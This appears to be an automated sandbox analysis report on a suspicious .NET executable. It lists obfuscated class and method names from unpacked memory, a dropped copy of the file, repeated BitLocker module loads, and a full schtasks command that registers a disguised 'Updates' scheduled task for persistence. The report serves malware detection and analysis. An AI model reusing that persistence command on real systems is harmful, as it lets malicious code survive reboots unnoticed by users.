Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, pasCFMLtKXAEJmZ1Oa.cs	High entropy of concatenated method names: 'UynBQ0cbAF', 'mVWBr4Fsxu', 'v97BxvDKUm', 'UU0BGjed9r', 'tXDBFOIxlu', 'h1tx0xIsXp', 'BRWxMgWqvC', 'bqwxApE701', 'XfOxW6OWL1', 'Vf2xZnxFD7'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, SsJX0fI1tV46UUM7Kh.cs	High entropy of concatenated method names: 'TxWc7GeXA', 'mcLhuGVTg', 'bCHKquow8', 'zTvq2rEUE', 'KfmCvOiQX', 'NrkSA4VcD', 'W4qpGG8t5L30j4S733', 'CqCbbPSRimFKCNAHCX', 'UcOvM5l0u', 'OIfVP4bEN'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, f1rDvoyICbalsOljJE.cs	High entropy of concatenated method names: 'LwuvwAFX7d', 'QLWvDADubA', 'ayXv6lVGNC', 'UvHv4PZANF', 'x7Vv9TUHEO', 'pvwvP0wES9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.8SxJ9aYfJ1.exe.3bb87b0.2.raw.unpack, glBYecz2lk6plH7KD1.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aXdfXiTlYX', 'VOofdVBQRb', 'YiUfjrWoVD', 'Jclf1f6rfQ', 'jitfvc0rP4', 'fWbff1v2JN', 'Be3fVk9eg1'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, Y2IHfS803OE2xeLpjv.cs	High entropy of concatenated method names: 'YeQdtxE2t2', 'hWXdbeSlo8', 'Qj2d9Ujg3C', 'Ld4dlBMka9', 'pHedDAE8uW', 'E6Wd6QXFqY', 'umpd4oItsL', 'w3vdP0rbGo', 'R4ydphrKV6', 'mKCd7nLgF8'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, J9RVJ6K99W0MlJv4fW.cs	High entropy of concatenated method names: 'jS9r9Z9ISO', 'jsHrlETR2h', 'DYXruMFV5P', 'cN4rL4cjPd', 'kbMr0APsnt', 'D7PrMWEGqJ', 'n81rAQ5oLx', 'uFrrWKwNON', 'b28rZDn4VH', 'bClr2jo0iL'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	High entropy of concatenated method names: 'tRgJQAW6LH', 'CYiJEmYNpq', 'LSjJrVg39P', 'PX8JIT64Vq', 'hWtJx71YeE', 'eQrJBoebDy', 'M1JJGQy3kq', 'QKWJFbePNP', 'hWrJ8polrn', 'yQtJotW3ia'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, sElARX1fmIIkSrG6t6J.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FXhV9c00cY', 'gnIVlYg25m', 'dYMVuwau9n', 'libVLk2tF6', 'BDtV0nMQx8', 'VnVVMWCgsi', 'SKrVAd1luZ'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, zVHbFNYULAGJFspyUV.cs	High entropy of concatenated method names: 'Dispose', 'xwWyZkFTYk', 'BcveD7AmEK', 'EcCkkoyaNp', 'QbQy25AbHh', 'DSMyzdPt5t', 'ProcessDialogKey', 'fmoesPkgaX', 'QSyeyCsWsM', 'vDMeePfuKN'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, wB2Rr9wfkSfia2CgoH.cs	High entropy of concatenated method names: 'ToString', 'Qd1jnyVS0c', 'aFQjDsnj9K', 'iZMj6wKEQT', 'oYUj4FhalN', 'MeOjPfMKXD', 'B2Njpmhvli', 'C5rj7n6r4E', 'QZCjNnMo6a', 'TXgjiIkgOh'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, rFvtaNchkTr3nMUUIn.cs	High entropy of concatenated method names: 'KERvElHXvk', 'j85vr8spPH', 'QBnvIsbgHJ', 'luNvx1nNSf', 'VHrvB6QqE1', 'fLEvGOfOc1', 'jXWvFqcFEM', 'JTuv8fGcDw', 'TSevoLFeXH', 'EwNvmmpiWt'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, jb1pfZdktLu52my0oO.cs	High entropy of concatenated method names: 'BGqGR4pA17', 'ugsGgPaAd2', 'fQqGcKCUil', 's6rGh4OBPZ', 'W9lGUf05gt', 'qs6GKU6EWE', 'wNfGq2CipJ', 'Vk8GOf8S8m', 'kKQGCSdivA', 'EbDGSqdj6Z'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, HiQ4I43Uvsow4nTqbt.cs	High entropy of concatenated method names: 'OU9XOXY5Dx', 'IV9XCaK0Ey', 'sKhXwG6MoY', 'OJIXDhpOox', 'W9iX4GvKiZ', 'eSwXPPjSB6', 'DSSX7tXjoI', 'ctOXNQiHAK', 'AGCXtPos8F', 'lkCXnr1ycn'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, RWpFebSe4HVyqtjbec.cs	High entropy of concatenated method names: 'Qdq1W2G1bx', 'jor12ZaWoA', 'L7yvscNQop', 'q1SvymZTIh', 'gGT1naWDmk', 'Oel1bIxkko', 'tMQ1To0fRY', 'nv419WSKNZ', 'Cjl1lLSgjc', 'nLF1umybL0'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, Q10DCOH47cMss7Ao3T.cs	High entropy of concatenated method names: 'JiQxUXpVLr', 'xjmxqgy0iM', 'LfxI6eLQYh', 'cZpI4jq72a', 's62IP0bXZE', 'yisIp8sM0T', 'rJ6I77pcbv', 'xXiINbL72T', 'z8JIiUTtM4', 'XMiItJYdSb'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, I1OuxervgZa6PWoI0E.cs	High entropy of concatenated method names: 'Ka91o918Nt', 'MgE1mki3qj', 'ToString', 'mAf1Ea6lIf', 'Oyl1ruwv0f', 'vn51ITOTVy', 'Fyc1xMSPJj', 'wC61Byax2W', 'Kdb1GSgbRQ', 'Uwm1FJ5kTj'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, rJYWQ2oBq7Yb7jo00a.cs	High entropy of concatenated method names: 'iUr3ymljsGvvs9LHLHS', 'mqNnf1lfICqTTyJYKbR', 'LBeBv08Tr2', 'ud3BfgAkiE', 'TaMBVqKGoZ', 'xNDbFBlVwinT3RARj6r', 'Q1wPMklYGoPxIKlkyWV'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, jaQqi6JmmnmdPZuwgH.cs	High entropy of concatenated method names: 'fjWGEmImNo', 'fWHGIenf9e', 'wvuGBsPFkI', 'jBAB20wcUo', 'hOFBz0kuYF', 'IOKGsAvvvu', 'fX0GyTMijv', 'bQwGergg72', 'kIdGJrEvCK', 'sJMGaJgEdI'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, X7Ye7Th1idJlwDwrpj.cs	High entropy of concatenated method names: 'jUJIh2J5h2', 'VfSIKiga3Q', 'yFqIOZm1Pi', 'RtRIC1jco2', 'SoBIdLLdEI', 'WrEIjU7o8N', 'L3xI1G3PVy', 'SKZIvbSOwq', 'kHGIfsIs7x', 'xDJIV6tV0g'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, ElqWMNNuTTe5PkiWTf.cs	High entropy of concatenated method names: 'smkyG8xcGP', 'W9oyFPGCWB', 'lPqyo4q7NS', 'CnCymvmMWE', 'U66ydQBKuo', 'Ypxyjywwfx', 'ttliZk5LyBm7C9lKLm', 'cpPnWDbOKiLPDO7VxF', 'IcfaoDHeY0TKAt2e12', 'eDtyy0wSC8'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, zvgrFmt1aRxW8NM3X7.cs	High entropy of concatenated method names: 'JBQfy7trsc', 'cnLfJqUEQ1', 'UodfaTtSq8', 'w6MfE89Gwf', 'EjXfrWbaR5', 't17fxJQjpc', 'pXsfBy3xcy', 'f2QvAMGuXZ', 'xPOvWGGxX9', 'GmwvZZ0QkU'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, mTwLB111SFPqglkQENw.cs	High entropy of concatenated method names: 'ToString', 'jXkVJ8JiZT', 'dg3Vae3KeC', 'zv4VQsXNJr', 'jMcVE4r8mQ', 'OX5Vr7L7gm', 'lOTVIg2LRK', 'r0YVxqKVgD', 'fIog4uhmLK0rlfqkfMQ', 'M6OUNghzwPhFYGsAnpu'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, WITcdq0YQjaZA5NFwT.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XcfeZESwgH', 'frme2MTbLk', 'elxezqt15O', 'q69JsUw0IM', 'zNaJyrKtUC', 'WmZJeoq9vo', 'sGtJJl7nWd', 'ihRrmiaaYXIDL0hJtlZ'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, tAMspT1Z90pZnDTmvOH.cs	High entropy of concatenated method names: 'QxSfRkNuZq', 'cu6fgOnGqk', 'UuTfcJclSt', 'g9xfhtXmcp', 'eDhfUAnHyp', 'NarfKZm7jr', 'fT8fqYEVvv', 'xNAfOYqIdl', 'D5NfCRjij9', 'ROmfSvf5y3'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, pasCFMLtKXAEJmZ1Oa.cs	High entropy of concatenated method names: 'UynBQ0cbAF', 'mVWBr4Fsxu', 'v97BxvDKUm', 'UU0BGjed9r', 'tXDBFOIxlu', 'h1tx0xIsXp', 'BRWxMgWqvC', 'bqwxApE701', 'XfOxW6OWL1', 'Vf2xZnxFD7'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, SsJX0fI1tV46UUM7Kh.cs	High entropy of concatenated method names: 'TxWc7GeXA', 'mcLhuGVTg', 'bCHKquow8', 'zTvq2rEUE', 'KfmCvOiQX', 'NrkSA4VcD', 'W4qpGG8t5L30j4S733', 'CqCbbPSRimFKCNAHCX', 'UcOvM5l0u', 'OIfVP4bEN'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, f1rDvoyICbalsOljJE.cs	High entropy of concatenated method names: 'LwuvwAFX7d', 'QLWvDADubA', 'ayXv6lVGNC', 'UvHv4PZANF', 'x7Vv9TUHEO', 'pvwvP0wES9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.8SxJ9aYfJ1.exe.3b30d90.1.raw.unpack, glBYecz2lk6plH7KD1.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aXdfXiTlYX', 'VOofdVBQRb', 'YiUfjrWoVD', 'Jclf1f6rfQ', 'jitfvc0rP4', 'fWbff1v2JN', 'Be3fVk9eg1'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, Y2IHfS803OE2xeLpjv.cs	High entropy of concatenated method names: 'YeQdtxE2t2', 'hWXdbeSlo8', 'Qj2d9Ujg3C', 'Ld4dlBMka9', 'pHedDAE8uW', 'E6Wd6QXFqY', 'umpd4oItsL', 'w3vdP0rbGo', 'R4ydphrKV6', 'mKCd7nLgF8'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, J9RVJ6K99W0MlJv4fW.cs	High entropy of concatenated method names: 'jS9r9Z9ISO', 'jsHrlETR2h', 'DYXruMFV5P', 'cN4rL4cjPd', 'kbMr0APsnt', 'D7PrMWEGqJ', 'n81rAQ5oLx', 'uFrrWKwNON', 'b28rZDn4VH', 'bClr2jo0iL'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, t2UsJXWPf4QR3Q12Gr.cs	High entropy of concatenated method names: 'tRgJQAW6LH', 'CYiJEmYNpq', 'LSjJrVg39P', 'PX8JIT64Vq', 'hWtJx71YeE', 'eQrJBoebDy', 'M1JJGQy3kq', 'QKWJFbePNP', 'hWrJ8polrn', 'yQtJotW3ia'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, sElARX1fmIIkSrG6t6J.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FXhV9c00cY', 'gnIVlYg25m', 'dYMVuwau9n', 'libVLk2tF6', 'BDtV0nMQx8', 'VnVVMWCgsi', 'SKrVAd1luZ'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, zVHbFNYULAGJFspyUV.cs	High entropy of concatenated method names: 'Dispose', 'xwWyZkFTYk', 'BcveD7AmEK', 'EcCkkoyaNp', 'QbQy25AbHh', 'DSMyzdPt5t', 'ProcessDialogKey', 'fmoesPkgaX', 'QSyeyCsWsM', 'vDMeePfuKN'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, wB2Rr9wfkSfia2CgoH.cs	High entropy of concatenated method names: 'ToString', 'Qd1jnyVS0c', 'aFQjDsnj9K', 'iZMj6wKEQT', 'oYUj4FhalN', 'MeOjPfMKXD', 'B2Njpmhvli', 'C5rj7n6r4E', 'QZCjNnMo6a', 'TXgjiIkgOh'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, rFvtaNchkTr3nMUUIn.cs	High entropy of concatenated method names: 'KERvElHXvk', 'j85vr8spPH', 'QBnvIsbgHJ', 'luNvx1nNSf', 'VHrvB6QqE1', 'fLEvGOfOc1', 'jXWvFqcFEM', 'JTuv8fGcDw', 'TSevoLFeXH', 'EwNvmmpiWt'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, jb1pfZdktLu52my0oO.cs	High entropy of concatenated method names: 'BGqGR4pA17', 'ugsGgPaAd2', 'fQqGcKCUil', 's6rGh4OBPZ', 'W9lGUf05gt', 'qs6GKU6EWE', 'wNfGq2CipJ', 'Vk8GOf8S8m', 'kKQGCSdivA', 'EbDGSqdj6Z'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, HiQ4I43Uvsow4nTqbt.cs	High entropy of concatenated method names: 'OU9XOXY5Dx', 'IV9XCaK0Ey', 'sKhXwG6MoY', 'OJIXDhpOox', 'W9iX4GvKiZ', 'eSwXPPjSB6', 'DSSX7tXjoI', 'ctOXNQiHAK', 'AGCXtPos8F', 'lkCXnr1ycn'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, RWpFebSe4HVyqtjbec.cs	High entropy of concatenated method names: 'Qdq1W2G1bx', 'jor12ZaWoA', 'L7yvscNQop', 'q1SvymZTIh', 'gGT1naWDmk', 'Oel1bIxkko', 'tMQ1To0fRY', 'nv419WSKNZ', 'Cjl1lLSgjc', 'nLF1umybL0'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, Q10DCOH47cMss7Ao3T.cs	High entropy of concatenated method names: 'JiQxUXpVLr', 'xjmxqgy0iM', 'LfxI6eLQYh', 'cZpI4jq72a', 's62IP0bXZE', 'yisIp8sM0T', 'rJ6I77pcbv', 'xXiINbL72T', 'z8JIiUTtM4', 'XMiItJYdSb'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, I1OuxervgZa6PWoI0E.cs	High entropy of concatenated method names: 'Ka91o918Nt', 'MgE1mki3qj', 'ToString', 'mAf1Ea6lIf', 'Oyl1ruwv0f', 'vn51ITOTVy', 'Fyc1xMSPJj', 'wC61Byax2W', 'Kdb1GSgbRQ', 'Uwm1FJ5kTj'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, rJYWQ2oBq7Yb7jo00a.cs	High entropy of concatenated method names: 'iUr3ymljsGvvs9LHLHS', 'mqNnf1lfICqTTyJYKbR', 'LBeBv08Tr2', 'ud3BfgAkiE', 'TaMBVqKGoZ', 'xNDbFBlVwinT3RARj6r', 'Q1wPMklYGoPxIKlkyWV'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, jaQqi6JmmnmdPZuwgH.cs	High entropy of concatenated method names: 'fjWGEmImNo', 'fWHGIenf9e', 'wvuGBsPFkI', 'jBAB20wcUo', 'hOFBz0kuYF', 'IOKGsAvvvu', 'fX0GyTMijv', 'bQwGergg72', 'kIdGJrEvCK', 'sJMGaJgEdI'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, X7Ye7Th1idJlwDwrpj.cs	High entropy of concatenated method names: 'jUJIh2J5h2', 'VfSIKiga3Q', 'yFqIOZm1Pi', 'RtRIC1jco2', 'SoBIdLLdEI', 'WrEIjU7o8N', 'L3xI1G3PVy', 'SKZIvbSOwq', 'kHGIfsIs7x', 'xDJIV6tV0g'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, ElqWMNNuTTe5PkiWTf.cs	High entropy of concatenated method names: 'smkyG8xcGP', 'W9oyFPGCWB', 'lPqyo4q7NS', 'CnCymvmMWE', 'U66ydQBKuo', 'Ypxyjywwfx', 'ttliZk5LyBm7C9lKLm', 'cpPnWDbOKiLPDO7VxF', 'IcfaoDHeY0TKAt2e12', 'eDtyy0wSC8'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, zvgrFmt1aRxW8NM3X7.cs	High entropy of concatenated method names: 'JBQfy7trsc', 'cnLfJqUEQ1', 'UodfaTtSq8', 'w6MfE89Gwf', 'EjXfrWbaR5', 't17fxJQjpc', 'pXsfBy3xcy', 'f2QvAMGuXZ', 'xPOvWGGxX9', 'GmwvZZ0QkU'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, mTwLB111SFPqglkQENw.cs	High entropy of concatenated method names: 'ToString', 'jXkVJ8JiZT', 'dg3Vae3KeC', 'zv4VQsXNJr', 'jMcVE4r8mQ', 'OX5Vr7L7gm', 'lOTVIg2LRK', 'r0YVxqKVgD', 'fIog4uhmLK0rlfqkfMQ', 'M6OUNghzwPhFYGsAnpu'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, WITcdq0YQjaZA5NFwT.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XcfeZESwgH', 'frme2MTbLk', 'elxezqt15O', 'q69JsUw0IM', 'zNaJyrKtUC', 'WmZJeoq9vo', 'sGtJJl7nWd', 'ihRrmiaaYXIDL0hJtlZ'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, tAMspT1Z90pZnDTmvOH.cs	High entropy of concatenated method names: 'QxSfRkNuZq', 'cu6fgOnGqk', 'UuTfcJclSt', 'g9xfhtXmcp', 'eDhfUAnHyp', 'NarfKZm7jr', 'fT8fqYEVvv', 'xNAfOYqIdl', 'D5NfCRjij9', 'ROmfSvf5y3'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, pasCFMLtKXAEJmZ1Oa.cs	High entropy of concatenated method names: 'UynBQ0cbAF', 'mVWBr4Fsxu', 'v97BxvDKUm', 'UU0BGjed9r', 'tXDBFOIxlu', 'h1tx0xIsXp', 'BRWxMgWqvC', 'bqwxApE701', 'XfOxW6OWL1', 'Vf2xZnxFD7'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, SsJX0fI1tV46UUM7Kh.cs	High entropy of concatenated method names: 'TxWc7GeXA', 'mcLhuGVTg', 'bCHKquow8', 'zTvq2rEUE', 'KfmCvOiQX', 'NrkSA4VcD', 'W4qpGG8t5L30j4S733', 'CqCbbPSRimFKCNAHCX', 'UcOvM5l0u', 'OIfVP4bEN'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, f1rDvoyICbalsOljJE.cs	High entropy of concatenated method names: 'LwuvwAFX7d', 'QLWvDADubA', 'ayXv6lVGNC', 'UvHv4PZANF', 'x7Vv9TUHEO', 'pvwvP0wES9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.8SxJ9aYfJ1.exe.69c0000.4.raw.unpack, glBYecz2lk6plH7KD1.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aXdfXiTlYX', 'VOofdVBQRb', 'YiUfjrWoVD', 'Jclf1f6rfQ', 'jitfvc0rP4', 'fWbff1v2JN', 'Be3fVk9eg1'

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

File created: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
